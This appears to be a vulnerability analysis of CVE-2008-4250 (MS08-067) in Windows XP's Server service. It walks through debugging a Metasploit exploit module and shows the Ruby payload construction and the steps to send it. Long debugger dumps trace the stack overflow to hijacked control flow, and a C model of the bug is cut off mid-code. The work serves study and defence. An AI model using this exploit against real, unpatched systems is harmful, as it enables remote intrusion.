【Windows Exploit】CVE-2008-4250 Vulnerability Analysis
Affected versions: Windows 2000, Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008
Version tested in this write-up: Windows XP Professional SP1
Vulnerability description: the NetpwPathCanonicalize function in NETAPI32.dll, reached through the Server service (svchost.exe -k netsvcs), contains a stack buffer overflow. When a crafted path containing "\..\..\" is canonicalized, the backward search for the previous path component walks past the start of the buffer, so the msvcrt.wcscpy that follows writes below the buffer and overwrites the saved return address of that very wcscpy call; when wcscpy executes `retn`, control passes to an attacker-chosen address. On Windows 2000, XP and Server 2003 the vulnerability can be exploited without authentication; on Windows Vista and Server 2008 authentication may be required.
Patch: see https://learn.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067
1. 🛠️Environment setup
- Kali Linux
- Windows XP Professional SP1
- VSCode (with the Ruby, Ruby LSP, Ruby Sorbet and VSCode rdbg Ruby Debugger extensions)
- OllyICE or OllyDbg
1-1. Set up the Ruby development environment
# Install and configure rbenv and its plugins
git clone https://github.com/rbenv/rbenv.git ~/.rbenv
git clone https://github.com/rbenv/ruby-build.git ~/.rbenv/plugins/ruby-build
git clone https://github.com/jamis/rbenv-gemset.git ~/.rbenv/plugins/rbenv-gemset
git clone https://github.com/rkh/rbenv-update.git ~/.rbenv/plugins/rbenv-update
git clone https://github.com/AndorChen/rbenv-china-mirror.git ~/.rbenv/plugins/rbenv-china-mirror
# Add to ~/.zshrc, ~/.bashrc or ~/.bash_profile
export PATH="$HOME/.rbenv/bin:$PATH"
eval "$(rbenv init -)"
export RUBY_BUILD_MIRROR_URL=https://cache.ruby-china.com
# Point gem and bundler at the Tsinghua mirror
gem sources --add https://mirrors.tuna.tsinghua.edu.cn/rubygems/ --remove https://rubygems.org/
gem sources -l
bundle config mirror.https://rubygems.org https://mirrors.tuna.tsinghua.edu.cn/rubygems
1-2. Set up the metasploit-framework development environment
# Download metasploit-framework (the author's fork)
cd ~ && git clone https://github.com/BinRacer/metasploit-framework.git
cd metasploit-framework
# Install the Ruby version the framework pins
rbenv install $(cat .ruby-version)
rbenv local $(cat .ruby-version)
# Install dependencies
gem install bundler
bundle install
# Add the VS Code debug configuration. The heredoc delimiter is quoted so the
# shell leaves ${workspaceRoot} alone for VS Code to expand.
mkdir -p .vscode
cat > .vscode/launch.json <<'EOF'
{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "type": "rdbg",
            "name": "Debug ms08_067_netapi",
            "request": "launch",
            "script": "${workspaceRoot}/msfconsole",
            "args": [
                "-r",
                "${workspaceRoot}/modules/exploits/windows/smb/ms08_067_netapi_debug.rc"
            ],
            "askParameters": false,
            "useBundler": true,
            "useTerminal": true
        },
        {
            "type": "rdbg",
            "name": "Attach with rdbg",
            "request": "attach"
        }
    ]
}
EOF
1-3. Prepare the exploit script
# Download ms08-067
cd ~ && git clone https://github.com/BinRacer/ms08-067.git
# Replace x.x.x.x in the rc file with the target's actual IP address, then copy the module and the rc file into the framework
cp -a ~/ms08-067/src/ms08_067_netapi_sp1.rb ~/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi_sp1.rb
cp -a ~/ms08-067/src/ms08_067.rc ~/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi_debug.rc
2. 🛠️Start debugging
2-1. Find the PID of the target service process
Open a cmd window as administrator and query the PID of the target service process.
# The target is the svchost.exe -k netsvcs instance, which hosts the Server service (PID 980 below)
C:\Documents and Settings\bogon>wmic process where caption="svchost.exe" get processid,commandline
CommandLine ProcessId
C:\WINDOWS\system32\svchost -k rpcss 880
C:\WINDOWS\System32\svchost.exe -k netsvcs 980
C:\WINDOWS\System32\svchost.exe -k NetworkService 1148
C:\WINDOWS\System32\svchost.exe -k LocalService 1180
C:\Documents and Settings\bogon>
2-2. Attach to the target process and open NETAPI32.dll
Right-click OllyICE and run it as administrator. In the main window choose File > Attach, sort by name and pick the svchost.exe with PID 980 (the -k netsvcs instance found above).

Once the process has loaded, choose View > Executable modules, sort by path and double-click NETAPI32.dll.

2-3. Search the module's names
In the CPU window, right-click and choose Search for > Name (label) in current module.

2-4. Set breakpoints
Find NetpwPathCanonicalize in NETAPI32.dll's name list and press F2 to set a breakpoint on it.

Double-click NetpwPathCanonicalize to open it in the CPU window, locate 71BA2BB1 E8 1B000000 call 71BA2BD1 and set a breakpoint on it.

Follow the call into 71BA2BD1, locate 71BA2C54 E8 3B000000 call 71BA2C94 and set a breakpoint on it (71BA2C94 is the routine that performs the copies; its return address 71BA2C59 shows up on the stack later).

Go to 71BADFEC and set a breakpoint there: this is the `call` to msvcrt.wcscpy (the return address 71BADFF2 that later appears on the stack is the instruction right after it). This wcscpy is where the bug is triggered, and the breakpoint is hit twice. The first copy collapses the component in front of the first "\..\" and stays inside the buffer. The second copy starts below the buffer, because the backward search for the previous backslash runs past the buffer's start, and it overwrites the return address that wcscpy's own `retn` will pop; that is how control is taken.

Press F9 to let the process run.
2-5. Build the payload
Open the metasploit-framework project in VSCode and look at 👉ms08_067_netapi_sp1.rb; the malicious path is built as follows:
#
# Build the malicious path name
#
prefix = '\\'
path = ''
# server is consumed elsewhere in the module when the request is assembled; only path matters here
server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front by the first "\..\" collapse
'B' * 100 +
# Marker for the start of the shellcode
'S' * 16 +
# Shellcode
payload.encoded +
# Marker for the end of the shellcode
'E' * 16 +
# Relative path to trigger the bug
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode('A' * 7) +
# Overwrites the 4 bytes just below the return address
'P' * 4 + # EBP
# Return to embedded jump (0x01001361 for this target; bytes 61 13 00 01 in the dumps below)
[target.ret].pack('V') + # ret addr
# Padding with embedded jump
'D' * 50 +
# eb 72 = jmp short to the shellcode: target = address of this jmp + 2 (its own length) + 0x72
"\xeb\x72" +
# Padding
'D' * 18 +
# NULL termination
"\x00" * 2
2-6. Send the payload
With the debug configuration in place, start the VS Code debug session; msfconsole runs the rc file and sends the malicious request to the target.
OllyICE hits the breakpoint

Press F9 to run to the breakpoint in the routine that contains the bug

The malicious path in memory matches what the Ruby file builds: the leading 5C 00, 100 'B's, 16 'S's, the encoded shellcode, 16 'E's, the Unicode "\..\..\" (at 011CF6D2), seven Unicode 'A's, PPPP, the return address bytes 61 13 00 01, 50 'D's, EB 72, 18 'D's and two NUL bytes:
011CF4B4 5C 00 42 42 42 42 42 42 42 42 42 42 42 42 42 42 \.BBBBBBBBBBBBBB
011CF4C4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4D4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4E4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4F4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF504 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF514 42 42 42 42 42 42 53 53 53 53 53 53 53 53 53 53 BBBBBBSSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
Press F9 to run to the 71BADFEC breakpoint; this is the first hit of msvcrt.wcscpy. In the stack window the arguments are dest = 011CF4B4 (the buffer start, i.e. the leading backslash) and src = 011CF6D8 (from the second "\..\" onward), so this copy drops the 'B'/'S'/shellcode/'E' component that precedes the first "\..\":

011CF4B4 5C 00 42 42 42 42 42 42 42 42 42 42 42 42 42 42 \.BBBBBBBBBBBBBB
011CF4C4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4D4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4E4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4F4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF504 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF514 42 42 42 42 42 42 53 53 53 53 53 53 53 53 53 53 BBBBBBSSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF484 011CF4B4 |dest = 011CF4B4
011CF488 011CF6D8 \src = "\..\AAAAAAA",82,"?,82,"?",A8,"",A1,"?????????????????????????狫?????????"
011CF48C 77C13EBC msvcrt.wcslen
011CF490 00000001
011CF494 77C13D88 msvcrt.wcscat
011CF498 011CF6D2 UNICODE "\..\..\AAAAAAA"
011CF49C /011CF8C8
011CF4A0 |71BA2C59 RETURN to NETAPI32.71BA2C59 from NETAPI32.71BA2C94
011CF4A4 |011CF4B4
011CF4A8 |00000000
011CF4AC |000AB5E0
011CF4B0 |0011CFAC
011CF4B4 |4242005C
011CF4B8 |42424242
...
011CF510 |42424242
011CF514 |42424242
011CF518 |53534242
011CF51C |53535353
011CF520 |53535353
011CF524 |53535353
011CF528 |914B5353
011CF52C |48974A4E
...
011CF56C |CC8538FF
011CF570 |776C41B9 shell32.776C41B9
...
011CF5A0 |88F74418
011CF5A4 |77DA4239 ADVAPI32.77DA4239
011CF5A8 |D7B3D26A
...
011CF6CC |45454545
011CF6D0 |005C4545 SHLWAPI.005C4545
011CF6D4 |002E002E
011CF6D8 |002E005C
Press F8 to step over msvcrt.wcscpy. The buffer now begins with "\..\AAAAAAA" followed by PPPP, 61 13 00 01, the 'D' padding and EB 72; the shellcode itself was not moved and still starts at 011CF52A:

011CF4B4 5C 00 2E 00 2E 00 5C 00 41 00 41 00 41 00 41 00 \.....\.A.A.A.A.
011CF4C4 41 00 41 00 41 00 50 50 50 50 61 13 00 01 44 44 A.A.A.PPPPa.DD
011CF4D4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF504 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF514 44 44 44 44 00 00 53 53 53 53 53 53 53 53 53 53 DDDD..SSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF484 011CF4B4 UNICODE "\..\AAAAAAA"
011CF488 011CF6D8 UNICODE "\..\AAAAAAA"
011CF48C 77C13EBC msvcrt.wcslen
011CF490 00000001
011CF494 77C13D88 msvcrt.wcscat
011CF498 011CF6D2 UNICODE "\..\..\AAAAAAA"
011CF49C /011CF8C8
011CF4A0 |71BA2C59 RETURN to NETAPI32.71BA2C59 from NETAPI32.71BA2C94
011CF4A4 |011CF4B4 UNICODE "\..\AAAAAAA"
011CF4A8 |00000000
011CF4AC |000AB5E0
011CF4B0 |0011CFAC
011CF4B4 |002E005C
011CF4B8 |005C002E SHLWAPI.005C002E
011CF4BC |00410041
011CF4C0 |00410041
011CF4C4 |00410041
011CF4C8 |50500041
011CF4CC |13615050
011CF4D0 |44440100
011CF4D4 |44444444
...
011CF4FC |44444444
011CF500 |44444444
011CF504 |444472EB
011CF508 |44444444
011CF50C |44444444
011CF510 |44444444
011CF514 |44444444
011CF518 |53530000
011CF51C |53535353
011CF520 |53535353
011CF524 |53535353
011CF528 |914B5353
011CF52C |48974A4E
...
011CF568 |FFFFD8E8
011CF56C |CC8538FF
011CF570 |776C41B9 shell32.776C41B9
...
011CF5A0 |88F74418
011CF5A4 |77DA4239 ADVAPI32.77DA4239
011CF5A8 |D7B3D26A
...
011CF6BC |50C7D638
011CF6C0 |45454E72
011CF6C4 |45454545
011CF6C8 |45454545
011CF6CC |45454545
011CF6D0 |005C4545 SHLWAPI.005C4545
011CF6D4 |002E002E
011CF6D8 |002E005C
Press F9 to run to the 71BADFEC breakpoint again; this is the second hit of msvcrt.wcscpy. The "\..\" now sits at the very start of the buffer (011CF4B4), so the backward search for the previous backslash leaves the buffer and stops at the stray 5C 00 at 011CF46C. The arguments are therefore dest = 011CF46C, 0x48 bytes below the buffer, and src = 011CF4BA ("\AAAAAAA..."). Note what lies between them on the stack: 011CF480 holds 71BADFF2, the return address of this very wcscpy call:

011CF4B4 5C 00 2E 00 2E 00 5C 00 41 00 41 00 41 00 41 00 \.....\.A.A.A.A.
011CF4C4 41 00 41 00 41 00 50 50 50 50 61 13 00 01 44 44 A.A.A.PPPPa.DD
011CF4D4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF504 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF514 44 44 44 44 00 00 53 53 53 53 53 53 53 53 53 53 DDDD..SSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF46C 005E005C ASCII "????????????"
011CF470 011CF6E0
011CF474 011CF488
011CF478 77F53E8F ntdll.77F53E8F
011CF47C 011CF480
011CF480 71BADFF2 NETAPI32.71BADFF2
011CF484 011CF46C |dest = 011CF46C
011CF488 011CF4BA \src = "\AAAAAAA",82,"?,82,"?",A8,"",A1,"?????????????????????????狫?????????"
011CF48C 77C13EBC msvcrt.wcslen
011CF490 00000001
011CF494 77C13D88 msvcrt.wcscat
011CF498 011CF4B4 UNICODE "\..\AAAAAAA"
011CF49C /011CF8C8
011CF4A0 |71BA2C59 RETURN to NETAPI32.71BA2C59 from NETAPI32.71BA2C94
011CF4A4 |011CF4B4 UNICODE "\..\AAAAAAA"
011CF4A8 |00000000
011CF4AC |000AB5E0
011CF4B0 |0011CFAC
011CF4B4 |002E005C
011CF4B8 |005C002E SHLWAPI.005C002E
011CF4BC |00410041
dest (stack slot 011CF484) = 011CF46C; memory at dest before the copy, with the stray backslash at 011CF46C and the return address F2 DF BA 71 at 011CF480:
011CF46C 5C 00 5E 00 E0 F6 1C 01 88 F4 1C 01 8F 3E F5 77 \.^.圉堲?鮳
011CF47C 80 F4 1C 01 F2 DF BA 71 6C F4 1C 01 BA F4 1C 01 €?蜻簈l?呼
011CF48C BC 3E C1 77 01 00 00 00 88 3D C1 77 B4 F4 1C 01 ?羨...?羨呆
011CF49C C8 F8 1C 01 59 2C BA 71 B4 F4 1C 01 00 00 00 00 萨Y,簈呆....
011CF4AC E0 B5 0A 00 AC CF 11 00 5C 00 2E 00 2E 00 5C 00 嗟...\.....\.
011CF4BC 41 00 41 00 41 00 41 00 41 00 41 00 41 00 50 50 A.A.A.A.A.A.A.PP
011CF4CC 50 50 61 13 00 01 44 44 44 44 44 44 44 44 44 44 PPa.DDDDDDDDDD
src (stack slot 011CF488) = 011CF4BA; memory at src:
011CF4BA 5C 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 \.A.A.A.A.A.A.A.
011CF4CA 50 50 50 50 61 13 00 01 44 44 44 44 44 44 44 44 PPPPa.DDDDDDDD
011CF4DA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4EA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4FA 44 44 44 44 44 44 44 44 44 44 EB 72 44 44 44 44 DDDDDDDDDD雛DDDD
011CF50A 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 DDDDDDDDDDDDDD..
Press F7 to step into this second msvcrt.wcscpy, set a breakpoint on its `77C13DCD C3 retn`, and press F9 to run to it. ESI now points at 011CF4B6, and the copy has rewritten the stack below the buffer: 011CF47C holds PPPP and 011CF480 holds 61 13 00 01, i.e. target.ret = 0x01001361, where 71BADFF2 used to be. The `retn` will pop 0x01001361 instead of returning into NETAPI32.

ESI = 011CF4B6; the memory at ESI now holds the EB 72 jump written by the copy:
011CF4B6 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF4C6 44 44 44 44 00 00 50 50 61 13 00 01 44 44 44 44 DDDD..PPa.DDDD
011CF4D6 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E6 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F6 44 44 44 44 44 44 44 44 44 44 44 44 44 44 EB 72 DDDDDDDDDDDDDD雛
011CF506 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF516 44 44 00 00 53 53 53 53 53 53 53 53 53 53 53 53 DD..SSSSSSSSSSSS
011CF526 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 96 90 SSSSK慛J桯鴻態枑
011CF536 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 23 5B C鴸鵊麵怓C麭F?[
...
011CF6A6 50 23 AD 38 A5 7A ED B9 3E F9 32 05 C3 65 4D 80 P#?砉>?胑M€
011CF6B6 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 45 45 兟+鱓?智PrNEEEE
011CF6C6 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 2E 00 EEEEEEEEEEEE\...
Stack below the buffer after the copy (011CF47C = 50 50 50 50, 011CF480 = 61 13 00 01):
011CF464 B4 F4 1C 01 88 3D C1 77 5C 00 41 00 41 00 41 00 呆?羨\.A.A.A.
011CF474 41 00 41 00 41 00 41 00 50 50 50 50 61 13 00 01 A.A.A.A.PPPPa.
011CF484 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF494 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4A4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4B4 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 DD雛DDDDDDDDDDDD
011CF4C4 44 44 44 44 44 44 00 00 50 50 61 13 00 01 44 44 DDDDDD..PPa.DD
011CF4D4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF504 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF514 44 44 44 44 00 00 53 53 53 53 53 53 53 53 53 53 DDDD..SSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
dest (011CF46C) after the copy:
011CF46C 5C 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 \.A.A.A.A.A.A.A.
011CF47C 50 50 50 50 61 13 00 01 44 44 44 44 44 44 44 44 PPPPa.DDDDDDDD
011CF48C 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF49C 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4AC 44 44 44 44 44 44 44 44 44 44 EB 72 44 44 44 44 DDDDDDDDDD雛DDDD
011CF4BC 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 DDDDDDDDDDDDDD..
011CF4CC 50 50 61 13 00 01 44 44 44 44 44 44 44 44 44 44 PPa.DDDDDDDDDD
src (011CF4BA) after the copy:
011CF4BA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4CA 00 00 50 50 61 13 00 01 44 44 44 44 44 44 44 44 ..PPa.DDDDDDDD
011CF4DA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4EA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4FA 44 44 44 44 44 44 44 44 44 44 EB 72 44 44 44 44 DDDDDDDDDD雛DDDD
011CF50A 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 DDDDDDDDDDDDDD..
Keep stepping with F7: after `retn`, execution passes through target.ret and arrives at 011CF4B6, the address ESI was holding, where the EB 72 written by the copy sits. That `jmp short` lands at 011CF4B6 + 2 + 0x72 = 011CF52A, exactly the start of the shellcode.
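To tie the payload layout in 2-5 and the two wcscpy hits above together, here is a small C model of the "\..\" collapse, written for this page as an added example; it is not NETAPI32's code, not the author's module, and the patched DLL's real check may differ from the hardened variant shown. It lays a shortened copy of the module's path into one byte arena at the same relative offsets as the dumps (stray "\^" at +0x00 where 011CF46C is, the wcscpy return address 71BADFF2 at +0x14 where 011CF480 is, the path buffer at +0x48 where 011CF4B4 is), runs a vulnerable collapse whose backward search is unbounded, and then a hardened one that refuses a "\..\" with no parent component. The arena offsets, function names and UTF-16 helpers are this example's own, and four 0xCC bytes stand in for payload.encoded.

```c
/* Added example for this write-up, not NETAPI32 code: a model of the "\..\"
 * collapse in NetpwPathCanonicalize, laid out like the stack in the dumps. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t wch;                        /* UTF-16 code unit, as on Windows */

/* Byte offsets inside the arena, mirroring the dump addresses:
 * 011CF46C stray "\^", 011CF480 wcscpy's return address, 011CF4B4 path buffer. */
enum { OFF_STRAY = 0x00, OFF_RET = 0x14, OFF_BUF = 0x48, ARENA_BYTES = 0x200 };

static wch g_arena[ARENA_BYTES / sizeof(wch)];       /* one arena for the demo */

static size_t w_len(const wch *s) { size_t n = 0; while (s[n]) n++; return n; }
static void   w_cpy(wch *d, const wch *s) { while ((*d++ = *s++) != 0) { } }

static uint8_t *put_utf16(uint8_t *p, const char *s)             /* "A" -> 41 00 */
{ for (; *s; s++) { *p++ = (uint8_t)*s; *p++ = 0; } return p; }
static uint8_t *put_raw(uint8_t *p, const void *s, size_t n) { memcpy(p, s, n); return p + n; }
static uint8_t *put_fill(uint8_t *p, int c, size_t n) { memset(p, c, n); return p + n; }

/* Index of the first "\..\" at or after `from`, or -1. */
static long find_dotdot(const wch *buf, size_t from)
{
    size_t n = w_len(buf);
    for (size_t i = from; i + 3 < n; i++)
        if (buf[i] == '\\' && buf[i + 1] == '.' && buf[i + 2] == '.' && buf[i + 3] == '\\')
            return (long)i;
    return -1;
}

/* Vulnerable model. For each "\..\" it scans backwards for the previous
 * backslash and copies "\rest" over it, but the scan is not bounded by the
 * buffer start: with "\..\" at index 0 it walks into the stack below the
 * buffer and the copy lands there. Returns the last copy's destination in
 * code units relative to `buf` (negative = below the buffer). */
static long canonicalize_vuln(wch *buf)
{
    long p, last_dest = 0;
    while ((p = find_dotdot(buf, 0)) >= 0) {
        wch *q = buf + p - 1;
        while (*q != '\\') q--;              /* BUG: no "q > buf" check */
        last_dest = (long)(q - buf);
        w_cpy(q, buf + p + 3);               /* "\..\X" -> "\X" placed at q */
    }
    return last_dest;
}

/* Hardened model (one safe choice, not the patched DLL's exact logic):
 * bound the scan by the buffer start and reject a "\..\" with no parent. */
static int canonicalize_fixed(wch *buf)
{
    long p;
    while ((p = find_dotdot(buf, 0)) >= 0) {
        if (p == 0) return -1;               /* nothing above the root to pop */
        wch *q = buf + p - 1;
        while (q > buf && *q != '\\') q--;
        w_cpy(q, buf + p + 3);
    }
    return 0;
}

/* Lay out the arena: the stray backslash and the return address below the
 * buffer, then a shortened copy of the module's path at OFF_BUF. */
static wch *build_arena(void)
{
    uint8_t *b = (uint8_t *)g_arena, *p;
    memset(b, 0, ARENA_BYTES);
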